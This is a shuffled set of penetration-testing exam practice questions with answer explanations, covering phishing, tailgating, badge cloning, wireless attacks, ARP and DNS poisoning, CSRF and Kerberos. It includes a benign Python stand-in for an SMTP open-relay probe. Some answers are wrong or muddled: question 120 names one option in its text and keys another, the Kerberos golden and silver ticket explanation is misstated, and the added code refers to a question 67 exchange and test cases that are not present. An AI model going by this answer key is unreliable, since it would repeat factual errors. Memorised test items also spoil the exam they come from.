86. During a gray box penetration test, the tester decides to stress test a critical network router. She sends thousands of ping requests addressed to all of the hosts on the subnet. However, she spoofs the source address of the requests to the IP address of the network router. As a result, the router is flooded with ICMP echo response traffic that it didn't initiate, making it difficult for it to respond to legitimate network requests. What kind of exploit is this? A. Denial of service (DoS) B. Distributed denial of service (DDoS) C. Replay attack D. NAC bypass
B. By flooding the router with ICMP echo replies it never requested, the tester makes it difficult for the router to service legitimate network requests. Because every host on the subnet that answers the spoofed broadcast pings becomes an unwitting participant, many hosts are generating the attack traffic, so this is an example of a distributed denial of service (DDoS) attack; this particular reflection and amplification technique is known as a smurf attack. Most modern hosts and routers ignore ICMP echo requests sent to a broadcast address (on Linux, net.ipv4.icmp_echo_ignore_broadcasts = 1 is the default), which is why smurf attacks are rarely effective today.
23. A penetration tester sends a spear phishing email to an employee of the target organization, claiming to be a fellow employee who has forgotten her password. The email indicates she has a presentation in a few minutes and can't access her presentation files on a shared network drive. She asks the employee to "loan" her his username and password so she can log on and get the files. What motivation factor did the penetration tester use in this scenario? A. Fear B. Urgency C. Authority D. Scarcity
B. By masquerading as a fellow employee in great distress, the penetration tester is using urgency to motivate the employee to give up his username and password. She may also be relying on likeness (the employee's wish to help a colleague) as a factor.
115. Which security misconfiguration would allow a script run by the user's web browser to write data to a client-side cookie? A. Directory traversal B. Cookie manipulation C. Cross-site request forgery (XSRF) D. Clickjacking
B. Cookie manipulation is a client-side weakness in which a script running within the browser can read or write a client-side cookie, for example to alter a session identifier or a role value that the application trusts. Marking a cookie HttpOnly prevents scripts from reaching it through document.cookie, and any security-relevant value stored in a cookie should be signed or verified server-side so that a client-side change is detected.
11. You have been hired to conduct a black box penetration test for a client. You purchase a small flash drive and load it with malware that installs a keylogger on the victim's computer and sends the information it captures to you. You walk in the client's front door and ask the receptionist for directions to a nearby sports venue. While you are speaking, you deliberately drop the drive on the floor and then leave. Which exploit was used in this scenario? A. Shoulder surfing B. USB key drop C. Phishing D. Elicitation
B. In a USB key drop exploit, some type of malware is usually loaded on a flash drive. That drive is then deliberately left somewhere that an employee of the target organization will likely find it. The goal is for the employee to plug it in to see what it contains. Modern operating systems no longer run programs from removable media automatically, so the payload usually relies on the employee opening a file on the drive, or on a device that presents itself as a keyboard and types the commands itself.
98. Which wireless exploit involves creating an unauthorized connection with a Bluetooth device, such as a mobile phone, and stealing information from it? A. Deauth attack B. Bluesnarfing C. Bluejacking D. WPS cracking
B. In a bluesnarfing wireless exploit, an unauthorized Bluetooth connection is established with a wireless device, such as a mobile phone. That connection is then used to steal information from that device.
95. Which wireless exploit could be carried out by creating a fake captive portal for a wireless network that captures victims' usernames and passwords? A. Repeating attack B. Credential harvesting C. Bluesnarfing D. Jamming attack
B. In a credential harvesting attack, a fake website that looks like a legitimate website is used to capture victims' usernames and passwords. In the context of a wireless exploit, this could be accomplished using a fake captive portal that looks like a legitimate captive portal that captures victims' information.
101. A penetration tester impersonates a vending machine repair person to gain access to the target organization's facility. While inside, the tester hides a wireless device behind a vending machine that captures the organization's wireless network radio signal and rebroadcasts it with high gain towards the parking lot. Which wireless exploit did the tester employ in this scenario? A. Karma attack B. Repeating attack C. Downgrade attack D. Jamming attack
B. In a repeating attack, the penetration tester captures the target organization's wireless network radio signal and rebroadcasts it with high gain to extend its range. In this scenario, the organization's wireless network can now be accessed by the penetration tester from the parking lot.
83. During a gray box penetration test, the tester acts as a man-in-the-middle between a web server and an end user's workstation. When the user's browser requests a page from the web server using TLS 1.2, the tester alters the request and specifies that SSL 2.0 be used instead to protect the session. What kind of exploit has occurred in this scenario? A. SSL stripping B. Downgrade C. NAC bypass D. Replay attack
B. In this example, a downgrade man-in-the-middle attack has occurred because SSL 2.0 is far less secure than TLS 1.2. Unless the user is exceptionally vigilant, they will likely not notice that SSL is being used to protect the session instead of TLS. Current browsers and servers refuse SSL 2.0 and SSL 3.0 outright, and TLS includes downgrade protection (TLS_FALLBACK_SCSV for TLS 1.2 fallbacks and a downgrade sentinel in the TLS 1.3 server random), so a real test would more often target configurations that still allow an old protocol version or weak cipher suites than the version negotiation itself.
66. During a gray box penetration test, you discover an open SMTP service running on an older database server. You want to use this SMTP service to send phishing emails to users within the organization. What is this exploit called? A. Distributed denial of service B. SMTP relay C. Fraggle D. Teardrop
B. Leveraging an open SMTP service to send unauthorized email messages is called SMTP relay, and a server that permits it is an open relay. Most newer mail systems refuse to relay for domains they are not responsible for unless the sender authenticates, but many older server systems do not.
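The Telnet exchange from question 67 and the open-relay test this question describes, as an added example that is not part of the original study guide. A constructed stand-in server answers the way a real MTA would (the host names and addresses are placeholders); the probe function sends exactly the commands a tester types and decides from the RCPT TO reply. It quits before DATA, so nothing is actually relayed during the test.

```python
class FakeSmtpServer:
    """Constructed stand-in for the SMTP service on port 25. It accepts mail for its own
    domain (as nearly every MTA does) and relays to other domains only if open_relay is
    set. Real testing replaces this with a socket to the target, or smtplib."""

    def __init__(self, hostname: str, open_relay: bool):
        self.hostname = hostname
        self.open_relay = open_relay
        self.transcript = []

    def banner(self) -> str:
        return "220 %s ESMTP ready" % self.hostname

    def send(self, command: str) -> str:
        self.transcript.append(command)
        verb, _, arg = command.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            return "250 %s" % self.hostname
        if verb == "MAIL":
            return "250 2.1.0 Sender OK"
        if verb == "RCPT":
            to_domain = arg.split("@")[-1].strip("<>").lower()
            if to_domain == self.hostname.lower() or self.open_relay:
                return "250 2.1.5 Recipient OK"
            return "554 5.7.1 Relay access denied"
        if verb == "QUIT":
            return "221 Bye"
        return "500 Unrecognized command"


def probe_relay(server, tester_host: str, recipient: str) -> bool:
    """Same exchange a tester types into Telnet. Returns True if the server would
    accept the recipient; for a recipient outside the server's own domain that means
    it is an open relay. QUIT is sent instead of DATA so no message is queued."""
    if not server.banner().startswith("220"):
        raise RuntimeError("no SMTP banner")
    server.send("EHLO %s" % tester_host)
    server.send("MAIL FROM:<relaytest@%s>" % tester_host)
    reply = server.send("RCPT TO:<%s>" % recipient)
    server.send("QUIT")
    return reply.startswith("250")
```

The third case in the test is the one that matters for question 67: a server that is not an open relay still accepts mail addressed to its own users, so spoofed internal mail to the CEO often works even when relaying is closed. Whether it reaches the inbox then depends on authentication requirements and on SPF/DKIM/DMARC checks for the forged sender.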
43. A penetration tester impersonates a heating and cooling repair person to gain physical access to the target organization's facility. Once inside, she requests access to the server room to investigate a problem with the cold air return. As she is leaving the server room, she surreptitiously places a piece of strong tape over the door locking tab, allowing her to return into the room later without authorization. What is this technique called? A. Lock picking B. Lock bypass C. Fence jumping D. Badge cloning
B. Lock bypass occurs when an attacker prevents a door's locking mechanism from working. For example, this could be done by placing tape over the locking tab, as was done in this scenario.
51. A penetration tester impersonates a heating and cooling repair person to gain physical access to the target organization's facility. Once inside, she requests access to the server room to investigate a problem with the cold air return. As she is leaving the server room, she surreptitiously places a small wooden wedge into the door jamb, preventing the door from closing completely. This allows her to return into the room later without authorization. What is this technique called? A. Lock picking B. Lock bypass C. Fence jumping D. Badge cloning
B. Lock bypass occurs when an attacker prevents a door's locking mechanism from working. In this example, this was done by placing a wooden wedge in the door jamb, preventing the door from closing completely and preventing the locking mechanism from engaging.
34. Which motivation factor gets people to act quickly because they believe someone needs help? A. Social proof B. Urgency C. Scarcity D. Authority
B. Many people are naturally motivated to help others in distress. This is called urgency. When they believe someone needs help, they may bend or break the rules to help the person out.
36. Which motivation factor gets people to act because they worry about the consequences of not acting? A. Social proof B. Fear C. Scarcity D. Authority
B. Most people will respond to a request to act if they are made to fear the consequences of failing to act. This is one of the most basic human motivations.
57. During the information gathering phase of a gray box penetration test, you run the NBTSTAT -c command on the local network. One of the lines in the output reads as follows:

Name               Type        Host Address    Life [sec]
------------------------------------------------------------
PROD-9      <00>   UNIQUE      10.0.0.132      517

What do you know about the PROD-9 host? A. It is a server. B. It is a workstation. C. It is a router. D. It is a wireless device.
B. NBTSTAT identifies NetBIOS workstations with an ID of <00>. Based on this output, you know that PROD-9 is most likely a Windows workstation (or a Linux workstation running the Samba service).
88. During a gray box penetration test, you try to connect your laptop to the target's wireless network. However, the target has implemented a NAC that is blocking your laptop from connecting to the production network. What can you do? A. Run a brute-force decryption attack to defeat the IPSec encryption that protects the production network. B. Spoof your laptop with the MAC address of an authorized device. C. Plug your laptop into a wired jack. D. Create an evil twin access point.
B. One way to conduct a NAC bypass exploit is to spoof the tester's system with the MAC address of an authorized device. As long as the tester's system meets the organization's security policy requirements, the NAC system should allow it to access the production network.
38. A penetration tester enters the target organization's physical facility by striking up a conversation with an employee in the parking lot and walking with her through a door that uses a proximity badge reader to control access. The employee uses her badge to open the door and holds it open for the penetration tester. What is this technique called? A. Piggybacking B. Tailgating C. Lock bypass D. Badge cloning
B. Tailgating occurs when an intruder tags along with an authorized person through a physical barrier, such as a locking door or a turnstile. This happens with the authorized person's knowledge and/or consent.
46. A penetration tester waits in the target organization's parking lot early in the morning until she sees an employee heading toward the front door. She walks up behind the employee while clumsily carrying several large boxes. She asks the employee to hold the door for her and is able to enter the facility. What is this technique called? A. Piggybacking B. Tailgating C. Lock bypass D. Badge cloning
B. Tailgating occurs when an intruder tags along with an authorized person through a physical barrier, such as a locking door or a turnstile. This occurs with the authorized person's knowledge and/or consent. In this example, the authorized employee held the door open for the penetration tester.
65. What is the function of the Simple Mail Transfer Protocol (SMTP)? A. To share files on the network B. To transfer email messages between mail transfer agents (MTAs) C. To map IP addresses to MAC addresses D. To transfer email messages to a mail user agent (MUA)
B. The SMTP protocol is used to transfer email messages between mail transfer agents (MTAs).
29. A penetration tester sends an email to an employee of the target organization, claiming to be a sales rep on the road. She claims in the email that her VPN connection from her hotel is running extremely slow and that she can't access her client's data. If she doesn't get the data, she will lose the sale. The message asks the employee to email her a copy of the files. What motivation factor did the penetration tester use in this scenario? A. Social proof B. Urgency C. Scarcity D. Authority
B. The penetration tester is using urgency (and possibly likeness) as a motivating factor. The employee will probably comply with the request out of a desire to be seen as a "team player." This type of attack can be made even more effective by conducting reconnaissance beforehand and identifying the names of real sales reps working for the organization.
75. During a gray box penetration test, the tester sends a fake ARP broadcast message on the local network segment. As a result, her laptop's MAC address is now mapped to the IP address of another valid computer on the segment. What is this exploit called? A. DNS cache poisoning B. ARP spoofing C. Pass the hash D. Replay attack
B. This is an example of ARP spoofing. In this exploit, the tester sends a fake ARP broadcast on the network segment that maps the IP address of a legitimate network host to her MAC address. As a result, all traffic addressed to the legitimate host gets redirected to the tester's system.
112. During a gray box penetration test, the tester notices that the organization's human resources self-service web application uses Active Directory user accounts for authentication. It also includes a "Remember me" option on the login page. The tester sends an email message to high-level employees within the organization with the subject line "Check out this funny picture." When the email is opened, hidden HTML code actually sends an HTTP request to the self-service web application that changes the user's password. The attack relies on the saved session cookie from the site to work. What type of authentication exploit is this? A. Cross-site scripting (XSS) B. Cross-site request forgery (CSRF) C. Clickjacking D. Credential brute forcing
B. This is an example of a cross-site request forgery (CSRF). Because the session cookie from the website was saved locally, the user is perpetually logged on to the site. Therefore, the HTTP request to change the user's password contained in the email message didn't require authentication to execute. The penetration tester can now log on to Active Directory as a high-level employee.
20. You are performing reconnaissance as a part of a black box penetration test. You notice that the employees of the target organization commonly congregate at a particular outdoor restaurant for lunch. You begin frequenting the same restaurant for lunch and make friends with several of the target organization's employees. After you gain their trust, they begin to share information about their jobs, computers, bosses, customers, projects, and so on. What type of exploit occurred in this scenario? A. Whaling B. Elicitation C. Interrogation D. Phishing
B. This is an example of elicitation. By gaining the employees' trust, the tester was able to elicit sensitive information from them about their employer.
104. During a gray box penetration test, the tester uses Wireshark to sniff the network traffic between an employee's web browser and a website and is able to capture the session cookie. The tester is then able to impersonate the victim without capturing the user's actual authentication credentials. What type of authentication exploit was used in this scenario? A. Kerberos exploit B. Session hijacking C. Redirect attack D. Password cracking
B. This is an example of session hijacking. The tester was able to exploit the session key (the cookie) to gain access to the user's session. This type of exploit can be used against web applications where an HTTP cookie is used to maintain a session. Even though the site may have used TLS/SSL to encrypt authentication credentials, the session cookie is often not encrypted. If it is captured, it allows the tester to hijack the user's session.
118. Which of the following are examples of unsecure coding practices? A. Removing comments from the source code before release B. Checking input fields for properly formatted information C. Lack of error handling routines D. Lack of code signing E. Removing overly verbose error messages
C and D. The programmer should be sure to include routines that tell the application what to do should it encounter an error condition. For example, many buffer overflow attacks exploit applications that don't know how to respond when they receive more information than they were expecting. Likewise, all applications should have their code digitally signed. This will expose any unauthorized modifications made to the code.
13. Which exploit relies on text messaging to deliver phishing messages? A. Elicitation B. Spear phishing C. SMS phishing D. Whaling
C. An SMS phishing attack (also called a smishing attack) leverages text messaging instead of email to conduct a phishing exploit.
2. You are performing a gray box penetration test for a medium-sized organization. You have used reconnaissance techniques to identify a help desk employee and a payroll employee. You craft an email to the payroll employee that appears to come from the help desk employee directing the payroll employee to reset her password. When she clicks the link provided in the email, she is redirected to your own website where her credentials are captured to a text file. What kind of exploit did you use? A. Phishing B. Interrogation C. Spear phishing D. Whaling
C. A spear phishing attack was used in this scenario because the malicious email was crafted for one specific employee. A generic phishing attack, on the other hand, would have been sent indiscriminately to a large group of employees within the organization.
45. While waiting in line at a food truck behind an employee of the target organization, a penetration tester steals her access badge and makes a copy of its RFID signature on a fake access badge. What is this technique called? A. Egress sensor bypass B. Lock bypass C. Badge cloning D. Fence jumping
C. Badge cloning occurs when an attacker makes a copy of a valid access badge in order to enter a facility. By copying a valid badge's RFID signature, the penetration tester in this scenario can use the fake badge to access the target organization's facility using the authorized employee's credentials.
97. Which wireless exploit involves sending unsolicited messages over a Bluetooth connection to a wireless device? A. Deauth attack B. Bluesnarfing C. Bluejacking D. WPS cracking
C. In a bluejacking wireless exploit, unsolicited messages are sent over a Bluetooth connection to wireless devices, such as a mobile phone.
113. Which authentication exploit utilizes transparent layers within the same web page to trick a user into clicking a button or link when they thought they were just clicking the top-level layer of the page? A. File inclusion B. Cross-site request forgery (CSRF) C. Clickjacking D. Cookie manipulation
C. In a clickjacking exploit, the tester adds transparent layers to a web page in an attempt to fool a user into clicking a hidden button or link on a transparent layer. This allows the tester to hijack user clicks and send them to a different website (such as a credential harvesting site).
69. While performing a black box penetration test, you identify a significant amount of FTP data being transferred between an unknown internal host on the target network and hosts on the Internet on ports 20 and 21. How could you exploit this traffic to gain access to systems on the target network? A. Conduct a distributed denial-of-service (DDoS) attack. B. Conduct a land attack. C. Capture the FTP traffic with a sniffer. D. Use anonymous FTP access to upload a keylogger to the FTP server.
C. One of the key weaknesses with the FTP protocol is the fact that it transmits all data between the FTP server and the FTP client as clear text, including authentication credentials. By sniffing the FTP traffic, you may be able to capture FTP usernames and passwords. Some FTP server implementations leverage existing network user accounts and passwords to authenticate FTP connections. So, by capturing FTP authentication credentials, you could potentially be capturing internal network user accounts and passwords too.
33. Which motivation factor gets people to act because someone with clout wants them to? A. Likeness B. Social proof C. Authority D. Scarcity
C. People are naturally motivated by a respect for authority. When they believe someone in authority wants them to do something, they will frequently comply, especially if the request is coupled with a sense of urgency.
31. Which motivation factor gets people to act quickly due to a sense of limited supply? A. Social proof B. Likeness C. Scarcity D. Authority
C. People can be motivated to act quickly when they believe something they want is in limited supply. This is called scarcity. They don't want to miss out on an opportunity, product, deal, or service that will soon become unavailable.
82. What is the best way to defend against an SSL stripping attack? A. Update the virus definitions on users' workstations. B. Implement a network intrusion detection (NID) device. C. Implement a strict HSTS policy that prevents a user's browser from opening a page unless an HTTPS connection has been used. D. Reconfigure all browsers to require TLS sessions.
C. The best way to defend against an SSL stripping attack is to implement an HTTP Strict Transport Security (HSTS) policy that prevents a user's browser from opening a web page unless an HTTPS connection has been used to transfer the page from the web server to the client.
28. A penetration tester sends an email to a sales rep of the target organization, claiming to be the CEO of one of the organization's most important clients. The email asks the employee to create a VPN account to allow the CEO access to certain files on the organization's network. The email threatens to terminate the business relationship if this doesn't happen. What motivation factor did the penetration tester use in this scenario? A. Likeness B. Social proof C. Authority D. Scarcity
C. The penetration tester is using authority (and probably urgency along with fear) as a motivating factor. The sales rep may be inclined to create the VPN connection to prevent the supposed loss of an important client.
18. You have been hired to conduct a black box penetration test for a client. You walk into the organization's main entrance and ask the receptionist for information about current job openings. You watch the keystrokes she types on her computer in hopes of capturing sensitive information that you can use to gain access to the internal network. What kind of exploit was used in this scenario? A. Spear phishing B. Impersonation C. Shoulder surfing D. USB key drop E. Business email compromise
C. The penetration tester used shoulder surfing techniques in this scenario. In shoulder surfing, the tester observes information that employees type or display on their computers in an attempt to gather sensitive information. For example, the tester may use shoulder surfing to gather usernames, passwords, email addresses, phone numbers, file server share names, and so on.
120. A web application developer included the following HTML code within a form page: <input type=hidden> This is an example of which unsecure code practice? A. Comments in source code B. Hidden elements C. Unauthorized use of functions/unprotected APIs D. Race conditions
C. The programmer in this scenario has used hidden elements in the HTML code. This is an unsecure coding practice that can result in sensitive information being stored in the user's browser (the DOM).
73. A penetration tester is conducting a gray box penetration test. She notices that one of the branch offices of the organization uses a caching-only DNS server to handle name resolution requests. She sends a bogus reply to a name resolution request from the caching-only DNS server, using a spoofed source address in the reply packets. The bogus name resolution records point users to a fake web server that is used to harvest authentication credentials. What is this exploit called? A. DNS poisoning B. ARP poisoning C. DNS cache poisoning D. Man-in-the-middle
C. This is also an example of DNS cache poisoning. Instead of poisoning the local DNS cache on workstations, the cache of the caching-only DNS server has been poisoned in this scenario. The poisoned records will remain in the cache until the TTL value is reached.
72. A penetration tester is conducting a gray box penetration test. She crafts a Trojan horse exploit that flushes the DNS cache on the local workstation and replaces it with malicious name resolution entries that point to a fake web server. When clients within the organization try to resolve hostnames, the malicious entries from the local DNS cache are used. What is this exploit called? A. DNS poisoning B. ARP poisoning C. DNS cache poisoning D. Man-in-the-middle
C. This is an example of DNS cache poisoning. Instead of compromising a heavily protected DNS server, the penetration tester simply compromises the DNS cache on relatively less secure workstations. The net effect is the same. Malware is a common delivery vehicle for DNS cache poisoning exploits.
106. During a black box penetration test, the tester discovers that the organization's wireless access point has been configured with an administrative username of admin and a password of Admin. The tester gains administrative access to the access point. What kind of authentication exploit occurred in this scenario? A. Weak credentials exploit B. Redirect attack C. Default credentials attack D. Credential brute-forcing
C. This is an example of a default credentials attack. Most network devices, including access points, routers, firewalls, and so on, come from the factory preconfigured with default administrative credentials. These defaults are well documented on the Internet. If the administrator forgets to change them, then the tester can use them to gain administrative access to the device.
105. During a gray box penetration test, the tester uses phishing emails to send users to a logon page that looks like the target organization's human resources self-service page. The fake page is used to capture employees' credentials. What type of authentication exploit was used in this scenario? A. Kerberos exploit B. Session hijacking C. Redirect attack D. Credential brute forcing
C. This is an example of a redirect attack because users are redirected to a fake website by the phishing emails.
91. You are performing a gray box penetration test. To capture information from multiple VLANs, you have configured the network board in your computer to emulate a trunk port on a network switch. Your goal is to get the real switch to forward traffic from all VLANs to your device. What is this exploit called? A. MAC address spoofing B. Double-tagging C. Switch spoofing D. Evil twin
C. This is an example of a switch spoofing exploit that is used for VLAN hopping. In a switch spoofing exploit, the tester's network board is reconfigured to emulate a trunk port on a network switch. By doing this, the real switch will think it needs to forward traffic from all VLANs to the tester's device.
78. A replay attack is commonly categorized as which type of exploit? A. Denial of service (DoS) B. NAC bypass C. Distributed denial of service (DDoS) D. Man-in-the-middle
D. A replay attack is also classified as a man-in-the-middle attack.
3. You are performing a black box penetration test for a medium-sized organization. You have used reconnaissance techniques to identify the CEO's email address as well as the email address belonging to a help desk employee. You craft an email to the CEO that appears to come from the help desk employee directing the CEO to reset her password. When she clicks the link provided in the email, she is redirected to your own website where her credentials are captured to a text file. What kind of exploit did you use? A. Smishing B. Vishing C. Spear phishing D. Whaling
D. A whaling attack is essentially a form of spear phishing attack that is aimed specifically at C-suite employees, such as the CEO, CFO, COO, CIO, and so on. A standard spear phishing attack, on the other hand, would have been sent to a lower-level employee within the organization.
54. Using reconnaissance, a penetration tester learns that the target organization's employees use RFID access badges to unlock doors within the facility. Using the company's website, he identifies high-level employees within the organization. Then he waits in the parking lot until he sees one of these individuals heading toward the front doors. He walks behind them into the reception area with a small RFID reader hidden in his coat. He captures the RFID signature from the individual's badge and then creates his own fake access badge and encodes it with that RFID signature. What is this technique called? A. Piggybacking B. Tailgating C. Lock bypass D. Badge cloning
D. Badge cloning occurs when an attacker makes a copy of a valid access badge to enter a facility. By copying a valid badge's RFID signature, the penetration tester in this scenario can use the fake badge to access the target organization's facility using the authorized employee's credentials. Because he carefully selected a high-level employee's badge for cloning, he may be able to access more sensitive areas of the facility.
22. A penetration tester sends a spear phishing email to an employee of the target organization, claiming to be an agent with the Federal Bureau of Investigations (FBI). The email indicates that the employee's manager is being investigated for embezzlement and asks the employee to reply with sensitive internal information. What motivation factor did the penetration tester use in this scenario? A. Likeness B. Scarcity C. Social proof D. Authority
D. By masquerading as an FBI agent, the penetration tester in this example utilized authority (and possibly fear) as a motivation factor to coerce the employee into divulging sensitive information.
44. The exterior double glass door to a facility has a motion sensor installed that automatically unlocks the door when someone is leaving the facility. To gain unauthorized access to the facility, a penetration tester sprays a can of air duster in the center crack between the doors to trigger the motion sensor and unlock the door. What is this technique called? A. Lock picking B. Tailgating C. Fence jumping D. Egress sensor bypass
D. Egress sensor bypass occurs when an attacker manipulates an egress sensor to unlock a door. In this scenario, the moving compressed air from the air duster is much colder and denser than the surrounding air, causing the egress sensor to think someone is exiting the building and unlock the door.
40. As a penetration tester approaches the main entrance to the target organization's physical facility, she notices that a turnstile is used to control access. She carefully steps over the turnstile instead of walking through it. What is this technique called? A. Piggybacking B. Tailgating C. Lock bypass D. Fence jumping
D. Fence jumping occurs when an unauthorized person simply jumps over a physical barrier designed to control access. In this scenario, the penetration tester simply steps over the turnstile that is designed to prevent unauthorized people from entering.
48. A target organization's facility is surrounded by a tall chain-link fence topped with barbed wire. A penetration tester observes that a remote section of the fence is overgrown with shrubbery. Late at night, she uses bolt cutters to cut a slit in the fence that she can slip through at a later time. What is this technique called? A. Egress sensor bypass B. Lock bypass C. Badge cloning D. Fence jumping
D. Fence jumping occurs when an unauthorized person simply jumps over or cuts through a physical barrier designed to control access. In this scenario, the tester penetrated the physical fence barrier by cutting a hole in it.
99. A penetration tester learns that the target organization's employees use RFID access badges to unlock doors within the facility. She identifies a restaurant where employees of the organization commonly gather for lunch. The next day, she sits at a table near a group of employees in the restaurant with a small, hidden RFID reader. She captures the RFID signature from the employees' badges and then creates fake access badges using the RFID signatures. What is this technique called? A. WPS cracking B. Credential harvesting C. Jamming D. RFID cloning
D. In RFID cloning, the penetration tester captures the RFID signature from a legitimate RFID device and then copies it to a fake device. This is commonly done to copy an RFID access badge.
110. Which form of a cross-site scripting (XSS) attack leverages an older, vulnerable web browser being run locally on the victim's computer? A. Stored/persistent B. Clickjacking C. Reflected D. Document Object Model (DOM)
D. In a DOM XSS exploit, the attacker exploits weaknesses in the victim's web browser. Typically, outdated browsers are most susceptible to this type of exploit. This is considered to be a client-side XSS attack.
94. Which wireless encryption key cracking exploit involves extracting a small amount of keying material from captured wireless packets and then sending ARP frames to the access point? A. Repeating attack B. Downgrade attack C. Deauth attack D. Fragmentation attack
D. In a fragmentation wireless attack, a small amount of keying material is extracted from a captured packet. Then, an ARP packet is sent with known content to the access point. If the packet is echoed back by the AP, then even more keying information can be obtained from the returned packet. If this process is repeated over and over, the entire wireless key can be exposed.
100. Which wireless exploit is more of a stress test designed to prevent users from being able to use a wireless network? A. Karma attack B. Deauth attack C. Downgrade attack D. Jamming attack
D. In a jamming attack, the penetration tester transmits a radio signal in the 2.4 GHz and/or 5 GHz frequency ranges that is powerful enough to disrupt the legitimate wireless signal. This disruption prevents users from using the wireless network. As such, this exploit can be classified as a network stress test or denial-of-service attack.
6. Which social engineering technique involves questioning an employee using intimidation to gather information? A. Phishing B. Smishing C. Impersonation D. Interrogation
D. Interrogation involves questioning an employee of the target organization, using fear as a motivation to gather information. Interrogation is not a technique that is typically used by penetration testers.
96. Which wireless exploit involves using a brute-force attack to crack an eight-digit PIN? A. Fragmentation attack B. Credential harvesting C. Bluejacking D. WPS cracking
D. Many wireless devices use a Wi-Fi Protected Setup (WPS) system to make connecting to the wireless network easier. However, most WPS implementations have a key weakness in that they use a simple eight-digit PIN for authenticating wireless devices. Because of its short length, the PIN can be cracked quite quickly, allowing a penetration tester to easily connect to a target wireless network.
26. You are performing reconnaissance as a part of a black box penetration test. You notice that the employees of the target organization commonly congregate at a particular outdoor restaurant for lunch. You hire several young, physically attractive consultants to help with the penetration test. You send them to the same restaurant for lunch and have them make friends with several of the target organization's employees. They gain the employees' trust, and the employees begin to share information about their jobs, computers, bosses, customers, projects, and so on. Which motivation factor was used in this scenario? A. Authority B. Scarcity C. Social proof D. Likeness
D. The penetration tester is using likeness as a motivating factor. By hiring young, friendly, and physically attractive assistants, the penetration tester is able to coerce employees of the target organization into revealing sensitive information about their employer.
25. A penetration tester sends a phishing email to the employees of the target organization. The email purports to be offering iPads for an absurdly low price. However, there are only 25 left at this price. The link in the email leads to a fake website that uses a drive-by-download script that drops a keylogger on the employee's computer. What motivation factor did the penetration tester use in this scenario? A. Fear B. Social proof C. Authority D. Scarcity
D. The penetration tester is using scarcity as a motivating factor. By asserting that there are only a small number of devices available at the steeply discounted price, the employees are motivated to make a purchase before supplies run out.
119. A web application programmer has included the username and password required to access a database instance within the application's PHP code. This is an example of which unsecure code practice? A. Comments in source code B. Race conditions C. Unauthorized use of functions/unprotected APIs D. Hard-coded credentials
D. The programmer in this scenario has used hard-coded credentials. If an attacker (or a penetration tester) were to view the application's source code, they would have access to the database authentication credentials.
108. During a gray box penetration test, the tester is able to run an exploit that enables her to receive a ticket-granting ticket (TGT) from the key distribution center (KDC) in the organization's Active Directory domain. What kind of authentication exploit occurred in this scenario? A. Credential brute-forcing exploit B. Redirect attack C. Session hijacking D. Kerberos exploit
D. This is an example of a Kerberos exploit. Receiving a ticket-granting ticket (TGT) allows the user to obtain additional ticket-granting service (TGS) tickets, which grant access to specific network services. Because it allows users to get other TGS tickets, the TGT is sometimes referred to as a golden ticket. Because the TGS ticket can be used only to access a specific network service, it is sometimes referred to as a silver ticket.
74. While performing a gray box penetration test, the tester discovers that several Linux workstations in the network have not been joined to the organization's Active Directory domain, even though they have the Samba service installed. To access shared folders on Windows servers, these workstations use NT LAN Manager (NTLM) connections. The tester captures hashed user credentials as they are passed between workstations and servers and then reuses them later to establish new authenticated sessions with the file servers. What is this exploit called? A. ARP poisoning B. Fraggle attack C. NAC bypass D. Pass the hash
D. This is an example of a pass-the-hash exploit. In this exploit, the tester captures hashed NTLM user credentials and then reuses them to authenticate at a later point in time to a Windows system. Because NTLM authentication uses hashed credentials, the tester doesn't need to know the victim's actual username and password. The hashed credentials are sufficient to create a new authenticated session.
77. During a black box penetration test, the tester parks in the target organization's parking lot and captures wireless network signals emanating from the building with his laptop. By doing this, he is able to capture the handshake process used by an authorized wireless client as it connects to the network. He later resends this handshake on the wireless network, allowing his laptop to connect to the wireless network as that authorized client. What kind of exploit is this? A. DNS cache poisoning B. ARP spoofing C. Pass the hash D. Replay attack
D. This is an example of a replay attack. The tester captures valid handshake data from the wireless network and then replays it later to authenticate his laptop to the wireless network.